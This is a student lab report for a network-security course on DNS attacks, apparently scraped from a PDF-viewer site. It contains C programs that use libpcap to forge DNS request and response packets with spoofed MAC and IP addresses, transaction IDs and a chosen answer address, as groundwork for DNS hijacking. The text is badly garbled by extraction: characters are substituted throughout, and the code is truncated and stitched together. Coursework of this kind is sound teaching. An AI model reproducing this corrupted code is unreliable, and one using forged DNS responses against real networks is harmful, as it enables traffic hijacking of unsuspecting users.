NetworkSecurity MITM05016 DoNhuTai Lab2

7/27/2019 NetworkSecurity MITM05016 DoNhuTai Lab2

http://slidepdf.com/reader/full/networksecurity-mitm05016-donhutai-lab2 1/29

INTERNATIONAL UNIVERSITYSchool of Computer Science and Engineering

LAB 2: DNS attack (Part 1 + 2)

Course Network Security Lecturer Pham Van Hau,PhD!ate 24/09/2013 Duration: 180 minutes

Student I! "IT"#$#%& Student name '( N)* T+I

IntroductionTo do the DNS Hijacking attack, you need to

know how to generate, capture the packets programmatically.

Understand the udp, dns packet headers as well as the dns protocolThe purpose of this lab is to gie you hands!on e"perience on low leel network programming. #ore

precisely, you are going to create the dns re$uest and response. These will help you a lot for the ne"t

lab %&.

'n general, to generate the raw packet you can use

pcap library (http%))www.tcpdump.org)pcap.html&.

*ibnet library http%))packetfactory.openwall.net)projects)libnet)dist)deprecated)manual)lrm.html

or een the standard +' http%))en.wikipedia.org)wiki)-erkeleysockets

'n the conte"t of this lab, we use pcap library for our purpose. Seeral useful information can be foundat http%))www.tcpdump.org)pcap.html

To help you to hae an idea how the dns packet look like, on your linux machine

• open wireshark to capture the traffic

• open a terminal and e"ecute /nslookup ne"press.net0

Try to look at the different fields of the captured dns!packet and understand what they are used for.

This link http%))www.networksorcery.com)enp)protocol)dns.htm is also a great source for this purpose.

Part I: DNS packet generationTo help you on the programming stuff, ' hae created two programs, called dns_request_gen.c and

dns_response_gen.c. The programs ' sent to you are not complete. 1ou need to modify them at seeral places ( ' hae marked as /T2 -3 #2D'4'3D0&.

I. DNS packet request

#odify dns_request_gen.c to generate the dns re$uest that hae the

• source #+5% +6 +7 +8 +9 +: +;

• destination #+5% -6 -7 -8 -9 -: -;

• source port% 9<<<

• destination port% :8

• Transaction 'D% ++--

• source ' address%6.7.8.9

• destination ' address% ;.=.>.?

• dns $uerry to ask the ' address of /ne"press.net0

http://www.tcpdump.org/pcap.html

http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html

http://en.wikipedia.org/wiki/Berkeley_sockets



http://www.networksorcery.com/enp/protocol/dns.htm


http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html

http://en.wikipedia.org/wiki/Berkeley_sockets


http://www.networksorcery.com/enp/protocol/dns.htm



Answer%Dntai_dns_request_v1.c (without ip, udp checksum )#include <string.h> //strlen#include <stdlib.h> //malloc#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>

/* Ethernet headers are always eactly !" bytes */#define $%E_E&' !"

/* Ethernet addresses are ( bytes */#define E&'E)_++)_E- (

/* + )0&010 */#define +_)0 !2

struct dns_3uery { u_short 3_type; /* type of the host */ u_short 3_class; /* class */};

struct ethernet_header { u_char ether_dhost[E&'E)_++)_E-]; /* destination host address */ u_char ether_shost[E&'E)_++)_E-]; /* source host address */

u_short ether_type; /* $4 )4 ))4 etc */};

/* $ header */struct ip_header { u_char ip_5hl; /* 5ersion << " 6 header length >> 7 */ u_char ip_tos; /* type of ser5ice */ u_short ip_len; /* total length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset field */ #define $_)8 9:999 /* reser5ed fragment flag */ #define $_+8 9"999 /* dont fragment flag */ #define $_;8 97999 /* more fragments flag */ #define $_088; 9!fff /* mask for fragmenting bits */ u_char ip_ttl; /* time to li5e */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */

struct in_addr ip_src,ip_dst;};

#define $_'=ip ===ip?>ip_5hl @ 99f#define $_A=ip ===ip?>ip_5hl >> "

struct udp_header { u_short udp_sport; /* source port */ u_short udp_dport; /* destination port */ u_short udp_len; /* udp length */ u_short udp_sum; /* udp checksum */ };

struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */};

/* functions */5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion ! writen by +o -hu &aiCnB);}

5oid +-_name_con5erter(charhost,chardns);5oid +-_name_con5erter(charhost,chardns){ int len!strlen(host); dns[len"7]!9;



int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer

count""; } // $ncrease count len&&; // +ecrease len

} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer}

int main(int argc,char arg5[]){

char errb[1_E))G8_$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice

bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip;

u_char host; // host name to look up ip. EI 5nepress.net char de5; // network de5ice to capture. EI eth9 u_char packet[J999]; // packet is buffer to contain data

print_app_info();

i%(argc'!H){ printf(BsageI Ks <-etwork +e5iceDs -ame> <'ostname eIwww.5nepress.net> CnB,arg5[9]); eit(!); }e#se{ de5!arg5[!]; host!arg5[7]; }

// cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,net,mask,errb) !! &!){ printf(BErrorI KsCnB,errb); eit(!); }

// set the pcap description descr ! pcap_open_li5e(de5,G8$%,!,9,errb);

i% (descr !! *++){ printf(Bet description failedI KsCnB, errb); eit(!); }

// Fero out the packet =LEthernetM N L$M N L&1/+M N LpplicationM memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc

/* ????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */

struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header

u_char 3_name; // pointer chi toi 5ung dau chua 3uery_name int host_len!strlen(host); // do dai cua 3uery name chinh la so ky tu cua host name=5nepress.net co lenQ!H struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery

int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7



/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header) (packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));

// Puery -ame ointerR 3_name !(u_char)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)); // +ns Puery ointerR dns_3r !(struct dns_3uery)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name);

/* Ethernet 'eader */ bcopy(BC!C7CHC"CJC(B,eth&$ ether_shost,(); // ource ;1 ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BCG!CG7CGHCG"CGJCG(B,eth&$ ether_dhost, (); // +estination ;1 ddress bcopy(BC9:C99B,(char)eth&$ ether_type,7); // &ype $ =99:99

/* $ 'eader */ ip&$ ip_5hl ! 9"J; // $ 5ersion " @ length Q J words =79 bytes

ip&$ ip_tos ! 999; // +ifferentiated er5ices 8ield ip&$ ip_id ! htons(9f!a"); // $dentification ip&$ ip_off ! 9; ip&$ ip_ttl ! ("; // time to li5e ip&$ ip_p ! +_)0; // + protocol ip&$ ip_sum ! 9; // ip checksum =44

(ip&$ ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address

/* + 'eader */ udp&$ udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$ udp_dport ! htons(JH); // destination port udp&$ udp_sum ! 9; // udp checksum =44

/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(99!99); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!9; // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource

/* +- PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class

/* pdate ength $p 'eader and dp 'eader */ udp&$ udp_len! htons(sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(structdns_3uery)); ip&$ ip_len ! htons(sieo%(struct ip_header)) " udp&$ udp_len; // total length siFe_ip ! $_'(ip)";

/* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,$%E_E&'"ntohs(ip&$ ip_len)); i%(result !! 9) printf(BLacket sent sucessfullyMCnB); e#se printf(BLacket sent failureMCnB); }

return 9;}



@esult with capturing packet%

A @eceie ; dns re$uest packets

A 3thernet Header

A ' Header (with checksum error&

A UD Header

A Dns Buery

II. DNS packet response

#odify dns_response_gen.c to generate the dns response that hae the

• source #+5% -6 -7 -8 -9 -: -;

• destination #+5% +6 +7 +8 +9 +: +;

• source port% :8

• destination port% 9<<<



• Transaction 'D% ++--

• source ' address%;.=.>.?

• destination ' address% 6.7.8.9

• dns response% the ip address of /ne"press.net0 is /666.;:.79>.6870

Answer%Dntai_dns_response_v1.c (without ip, udp checksum )#include <string.h> //strlen#include <stdlib.h> //malloc#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>/* Ethernet headers are always eactly !" bytes */#define $%E_E&' !"


/* + )0&010 */#define +_)0 !2

struct dns_answer {

u_short a_name; /* answer host name */ u_short a_type; /* answer host type */ u_short a_class; /* answer host class */ u_char a_ttl["]; /* time to li5e cost " bytes */ u_short a_len; /* length */ struct in_addr a_addr; /* address of host */};


struct ethernet_header { u_char ether_dhost[E&'E)_++)_E-]; /* destination host address */ u_char ether_shost[E&'E)_++)_E-]; /* source host address */ u_short ether_type; /* $4 )4 ))4 etc */

};

/* $ header */struct ip_header { u_char ip_5hl; /* 5ersion << " 6 header length >> 7 */ u_char ip_tos; /* type of ser5ice */ u_short ip_len; /* total length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset field */ #define $_)8 9:999 /* reser5ed fragment flag */ #define $_+8 9"999 /* dont fragment flag */ #define $_;8 97999 /* more fragments flag */ #define $_088; 9!fff /* mask for fragmenting bits */ u_char ip_ttl; /* time to li5e */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst;

};



struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */



u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */};

/* functions */5oid print_app_info(5oid) { printf(B+ns response 5ersion ! writen by +o -hu &aiCnB);

}

5oid +-_name_con5erter(charhost,chardns);

5oid +-_name_con5erter(charhost,chardns){ int len!strlen(host); dns[len"7]!9;

int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount

}e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len


int main(int argc,char arg5[]){ u_char packet[J999]; char de5; // network de5ice char errb[1_E))G8_$%E]; pcap_t descr; // session description

bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host;

print_app_info();





// Fero out the packet memset(packet,9,"9O();

/*



????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */

struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery

u_char 3_name; // +ns name in 3uery struct dns_answer dns_as; // pointer chi toi 5ung dau cua dns answer

int host_len!strlen(host); // 'ostname length int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7

/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header)(packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));

// Puery name ointer

3_name !(u_char) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)); // +ns Puery ointer dns_3r !(struct dns_3uery) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name); // +ns nswer ointer dns_as!(struct dns_answer) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(struct dns_3uery));

/* Ethernet 'eader */ bcopy(BCG!CG7CGHCG"CGJCG(B,eth&$ ether_shost,(); // ource ;1 ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC!C7CHC"CJC(B,eth&$ ether_dhost,(); // +estination ;1 ddress bcopy(BC9:C99B,(char)eth&$ ether_type,7); // &ype $ =99:99

/* $ 'eader */ ip&$ ip_5hl ! 9"J; // $ 5ersion " @ length Q J words =79 bytes

ip&$ ip_tos ! 999; // +ifferentiated er5ices 8ield ip&$ ip_id ! htons(9f!a"); // $dentification ip&$ ip_off ! 9; ip&$ ip_ttl ! ("; // time to li5e ip&$ ip_p ! +_)0; // + protocol ip&$ ip_sum ! 9; // ip checksum =44

(ip&$ ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address

/* + 'eader */ udp&$ udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$ udp_dport ! htons("999); // destination port udp&$ udp_sum ! 9; // udp checksum =44

/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(9:!:9); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!htons(999!); // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource

/* +- PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class

/* +- nswer */ bcopy(BCc9C9cB,dns_as&$ a_name,7);



dns_as&$ a_type!htons(!); // type of the host dns_as&$ a_class!htons(!); // class bcopy(BC99C99C9!CcHB,dns_as&$ a_ttl,"); dns_as&$ a_len!htons(");

/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$ a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B);

/* pdate ength $p 'eader and dp 'eader */

udp&$ udp_len! htons(sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(structdns_3uery)"sieo%(struct dns_answer)); ip&$ ip_len ! htons(sieo%(struct ip_header)) " udp&$ udp_len; // total length siFe_ip ! $_'(ip)";

/* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,$%E_E&'"ntohs(ip&$ ip_len)); i%(result !! 9) printf(BLacket sent sucessfullyMCnB); e#se printf(BLacket sent failureMCnB); } return 9;}

@esult with capturing packet%A @eceie ; dns response packets

III.DNS packet response

The checksum (of ip and udp headers) of the generated packets are wrong. Do the necessary to make

them right.

Answer%Dntai_dns_request_v.c (with ip, udp checksum )#include <string.h> //strlen#include <stdlib.h> //malloc



#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>/* Ethernet headers are always eactly !" bytes */#define $%E_E&' !"


/* + )0&010 */#define +_)0 !2


struct ethernet_header { u_char ether_dhost[E&'E)_++)_E-]; /* destination host address */ u_char ether_shost[E&'E)_++)_E-]; /* source host address */ u_short ether_type; /* $4 )4 ))4 etc */};

/* $ header */struct ip_header {

u_char ip_5hl; /* 5ersion << " 6 header length >> 7 */ u_char ip_tos; /* type of ser5ice */ u_short ip_len; /* total length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset field */ #define $_)8 9:999 /* reser5ed fragment flag */ #define $_+8 9"999 /* dont fragment flag */ #define $_;8 97999 /* more fragments flag */ #define $_088; 9!fff /* mask for fragmenting bits */ u_char ip_ttl; /* time to li5e */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst;};




/* functions */5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion 7 writen by +o -hu &aiCnB);}



int count!9;



// 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; }

// $ncrease count len&&; // +ecrease len


/* ???????????? 8-1&$0- 1)E&E 1'E1; 08 +, $ ???????????????? */unsigned short csum (unsigned short buf, int nwords);

unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);

unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9;

int i; %or (i!9; i -(nwords/7); i"") sum "! buf[i];

sum ! (sum $$ !() " (sum 9ffff); sum "! (sum $$ !();

return 0sum;}

unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i;

// 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the endof packet i% (len7 '! 9){ padding !!; buff[len]!9; }

// $nitialiFe sum to Fero sum ! 9;

// um all the buffer in !( bit words %or(i!9;i -(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]);

// um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i -7;i"") sum"!ntohs((unsigned short) ip_src[i]);

%or(i!9;i -7;i"") sum"!ntohs((unsigned short) ip_dst[i]);

sum"! (unsigned short)udp_protocol " (unsigned short)len;

whi#e (sum$$ !() sum ! (sum 98888) " (sum $$ !();

return 0sum;}

int main(int argc,char arg5[]){



char errb[1_E))G8_$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip;

u_char host; // host name to look up ip. EI 5nepress.net char de5; // network de5ice to capture. EI eth9 u_char packet[J999]; // packet is buffer to contain data

print_app_info();



// set the pcap description

descr ! pcap_open_li5e(de5,G8$%,!,9,errb);


// Fero out the packet =LEthernetM N L$M N L&1/+M N LpplicationM memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc

/* ????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */

struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header

struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header

u_char 3_name; // pointer chi toi 5ung dau chua 3uery_name int host_len!strlen(host); // do dai cua 3uery name chinh la so ky tu cua host name=5nepress.net co lenQ!H struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery

int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7

/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header) (packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/

dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));

// Puery -ame ointerR 3_name !(u_char)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)); // +ns Puery ointerR dns_3r !(struct dns_3uery)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name);

/* Ethernet 'eader */ bcopy(BC!C7CHC"CJC(B,eth&$ ether_shost,(); // ource ;1 ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BCG!CG7CGHCG"CGJCG(B,eth&$ ether_dhost, (); // +estination ;1 ddress bcopy(BC9:C99B,(char)eth&$ ether_type,7); // &ype $ =99:99



/* $ 'eader */ ip&$ ip_5hl ! 9"J; // $ 5ersion " @ length Q J words =79 bytes ip&$ ip_tos ! 999; // +ifferentiated er5ices 8ield ip&$ ip_id ! htons(9f!a"); // $dentification ip&$ ip_off ! 9; ip&$ ip_ttl ! ("; // time to li5e ip&$ ip_p ! +_)0; // + protocol ip&$ ip_sum ! 9; // ip checksum =44

(ip&$ ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address

/* + 'eader */ udp&$ udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$ udp_dport ! htons(JH); // destination port udp&$ udp_sum ! 9; // udp checksum =44

/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(99!99); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!9; // number of answer dns&$ auth_count!9; // number of authority

dns&$ add_count!9; // number of resource

/* +- PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class

/* pdate ength $p 'eader and dp 'eader */ udp&$ udp_len! htons(sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(structdns_3uery)); ip&$ ip_len ! htons(sieo%(struct ip_header)) " udp&$ udp_len; // total length siFe_ip ! $_'(ip)";

/* +&E 1'E1; 08 $ 'E+E) -+ + 'E+E) */ ip&$ ip_sum!9; ip&$ ip_sum! (csum ((unsigned short ) (packet"$%E_E&') ,siFe_ip));

udp&$ udp_sum!9; udp&$ udp_sum! htons(udp_csum(ntohs(udp&$ udp_len), (u_short)(ip&$ ip_src) , (u_short)(ip&$ ip_dst), (unsigned short)udp));

/* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,$%E_E&'"ntohs(ip&$ ip_len)); i%(result !! 9) printf(BLacket sent sucessfullyMCnB); e#se printf(BLacket sent failureMCnB); }

return 9;}

@esult with capturing packet%A @eceie ; dns re$uest packets



Answer%

Dntai_dns_response_v.c (with ip, udp checksum )#include <string.h> //strlen#include <stdlib.h> //malloc#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>/* Ethernet headers are always eactly !" bytes */#define $%E_E&' !"


/* + )0&010 */#define +_)0 !2

struct dns_answer { u_short a_name; /* answer host name */ u_short a_type; /* answer host type */ u_short a_class; /* answer host class */ u_char a_ttl["]; /* time to li5e cost " bytes */ u_short a_len; /* length */ struct in_addr a_addr; /* address of host */};


struct ethernet_header { u_char ether_dhost[E&'E)_++)_E-]; /* destination host address */

u_char ether_shost[E&'E)_++)_E-]; /* source host address */ u_short ether_type; /* $4 )4 ))4 etc */};

/* $ header */struct ip_header { u_char ip_5hl; /* 5ersion << " 6 header length >> 7 */ u_char ip_tos; /* type of ser5ice */ u_short ip_len; /* total length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset field */ #define $_)8 9:999 /* reser5ed fragment flag */ #define $_+8 9"999 /* dont fragment flag */ #define $_;8 97999 /* more fragments flag */ #define $_088; 9!fff /* mask for fragmenting bits */ u_char ip_ttl; /* time to li5e */



u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst;};


struct udp_header { u_short udp_sport; /* source port */

u_short udp_dport; /* destination port */ u_short udp_len; /* udp length */ u_short udp_sum; /* udp checksum */ };


/* functions */

5oid print_app_info(5oid) { printf(B+ns response 5ersion 7 writen by +o -hu &aiCnB);}



int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$ 9){ // hile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD {

dns[len]!count; // tore counted number into the dns name buffer count!9; // et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len

} // hen get to the last character dns[9]!count; // tore the final counter into the dns name buffer

}

/* ???????????? 8-1&$0- 1)E&E 1'E1; 08 +, $ ???????????????? */unsigned short csum (unsigned short buf, int nwords);

unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);

unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9; int i; %or (i!9; i -(nwords/7); i"") sum "! buf[i];


return 0sum;



}

unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end

of packet i% (len7 '! 9){ padding !!; buff[len]!9; }


// um all the buffer in !( bit words %or(i!9;i -(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]);





return 0sum;}

int main(int argc,char arg5[]){ u_char packet[J999]; char de5; // network de5ice char errb[1_E))G8_$%E]; pcap_t descr; // session description

bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host;

print_app_info();





// Fero out the packet memset(packet,9,"9O();

/*



????????????????????? &ao mot goi tin L+- )EPE&M ???????????????????????? Ethernet 'eader N $ 'eader N + 'eader N +- 'eader N Puery -ame N +ns Puery */

struct ethernet_header eth; // pointer chi toi 5ung dau cua ethernet header struct ip_header ip; // pointer chi toi 5ung dau cua ip header struct udp_header udp; // pointer chi toi 5ung dau cua udp header struct dns_header dns; // pointer chi toi 5ung dau cua dns header struct dns_3uery dns_3r; // pointer chi toi 5ung dau cua dns 3uery

u_char 3_name; // +ns name in 3uery struct dns_answer dns_as; // pointer chi toi 5ung dau cua dns answer

int host_len!strlen(host); // 'ostname length int siFe_3_name!host_len"7; // kich thuoc cua 3uery name 5a dns 3uery header =7

/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header)(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header)(packet " $%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header)(packet " $%E_E&' " sieo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header)(packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));

// Puery name ointer

3_name !(u_char) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)); // +ns Puery ointer dns_3r !(struct dns_3uery) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name); // +ns nswer ointer dns_as!(struct dns_answer) (packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(struct dns_3uery));

/* Ethernet 'eader */ bcopy(BCG!CG7CGHCG"CGJCG(B,eth&$ ether_shost,(); // ource ;1 ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC!C7CHC"CJC(B,eth&$ ether_dhost,(); // +estination ;1 ddress bcopy(BC9:C99B,(char)eth&$ ether_type,7); // &ype $ =99:99

/* $ 'eader */

ip&$ ip_5hl ! 9"J; // $ 5ersion " @ length Q J words =79 bytes ip&$ ip_tos ! 999; // +ifferentiated er5ices 8ield ip&$ ip_id ! htons(9f!a"); // $dentification ip&$ ip_off ! 9; ip&$ ip_ttl ! ("; // time to li5e ip&$ ip_p ! +_)0; // + protocol ip&$ ip_sum ! 9; // ip checksum =44

(ip&$ ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address

